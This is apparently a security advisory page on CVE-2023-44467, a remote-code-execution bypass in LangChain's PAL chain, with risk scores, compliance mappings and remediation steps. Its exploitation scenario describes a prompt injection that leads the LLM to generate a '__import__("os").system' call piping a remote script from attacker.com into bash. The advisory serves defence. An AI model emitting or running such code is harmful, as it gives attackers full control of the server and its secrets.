CVE-2023-44467 — CRITICAL (CVSS 9.8) AI Security Vulnerability

CISO Take

If you run any LangChain application using the PAL (Program-Aided Language) chain, you have an unauthenticated RCE vulnerability that bypasses the prior CVE-2023-36258 patch. Upgrade langchain_experimental to >=0.0.306 immediately. Any deployment accepting user-controlled input to PAL chains should be treated as fully compromised until patched.

Risk Assessment

Critical risk. CVSS 9.8 reflects the worst-case combination: network-accessible, zero privileges required, zero user interaction, and full C/I/A compromise. The bypass nature — circumventing a prior fix — signals active adversarial research into escape paths, increasing the probability of in-the-wild exploitation. LangChain's widespread enterprise adoption in AI pipelines and internal tooling significantly amplifies the attack surface.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
langchain_experimental	pip	—	No patch
135.7K OpenSSF 6.5 2.6K dependents Pushed 7d ago 17% patched ~256d to patch Full package profile →

Do you use langchain_experimental? You're affected.

Severity & Risk

CVSS 3.1

9.8 / 10

EPSS

0.1%

chance of exploitation in 30 days

Higher than 34% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Actively Exploited

Sophistication

Trivial

Exploitation Confidence

high

✓ CISA KEV (active exploitation confirmed)

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I High

A High

Recommended Action

6 steps

Patch: Upgrade langchain_experimental to >=0.0.306 immediately — no workaround is reliable.
Audit: Identify all applications using PAL chain (grep for 'pal_chain', 'PALChain', or 'from langchain_experimental.pal_chain').
Isolate: If patching is delayed, disable PAL chain endpoints or restrict them to trusted internal networks only.
Sandbox: Run PAL chain execution in a hardened sandbox (gVisor, Firecracker, or restricted Docker with no network egress and read-only filesystem).
Monitor: Alert on unexpected process spawning from Python processes running LangChain.
Rotate credentials: Assume all API keys and secrets accessible to affected instances are compromised if exposed externally.

Classification

Code Execution Auth Bypass Framework Agent AML.T0010.001 - AI Software AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0051 - LLM Prompt Injection

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, Robustness and Cybersecurity

ISO 42001

A.6.2.5 - AI System Security Controls

NIST AI RMF

MANAGE-2.2 - Risk Treatment — AI Risk Mitigation

OWASP LLM Top 10

LLM01 - Prompt Injection LLM02 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2023-44467?

If you run any LangChain application using the PAL (Program-Aided Language) chain, you have an unauthenticated RCE vulnerability that bypasses the prior CVE-2023-36258 patch. Upgrade langchain_experimental to >=0.0.306 immediately. Any deployment accepting user-controlled input to PAL chains should be treated as fully compromised until patched.

Is CVE-2023-44467 actively exploited?

Yes, CVE-2023-44467 is confirmed actively exploited and listed in CISA Known Exploited Vulnerabilities catalog.

How to fix CVE-2023-44467?

1. Patch: Upgrade langchain_experimental to >=0.0.306 immediately — no workaround is reliable. 2. Audit: Identify all applications using PAL chain (grep for 'pal_chain', 'PALChain', or 'from langchain_experimental.pal_chain'). 3. Isolate: If patching is delayed, disable PAL chain endpoints or restrict them to trusted internal networks only. 4. Sandbox: Run PAL chain execution in a hardened sandbox (gVisor, Firecracker, or restricted Docker with no network egress and read-only filesystem). 5. Monitor: Alert on unexpected process spawning from Python processes running LangChain. 6. Rotate credentials: Assume all API keys and secrets accessible to affected instances are compromised if exposed externally.

What systems are affected by CVE-2023-44467?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM reasoning pipelines, code-executing AI agents, PAL chain deployments, AI coding and math assistants.

What is the CVSS score for CVE-2023-44467?

CVE-2023-44467 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.14%.

Technical Details

NVD Description

langchain_experimental (aka LangChain Experimental) in LangChain before 0.0.306 allows an attacker to bypass the CVE-2023-36258 fix and execute arbitrary code via __import__ in Python code, which is not prohibited by pal_chain/base.py.

Exploitation Scenario

An attacker sends a crafted natural language query to a LangChain application using PAL chain — for example, a math reasoning assistant or agentic tool. The PAL chain prompts the LLM to generate Python code to solve the query. The attacker's input is designed to cause the LLM to include '__import__("os").system("curl attacker.com/shell.sh | bash")' or similar in the generated code. Because pal_chain/base.py's sanitization blocklist does not prohibit __import__, the code executes unobstructed on the server, granting full RCE with the process's privileges. No authentication, no special access — one HTTP request is sufficient.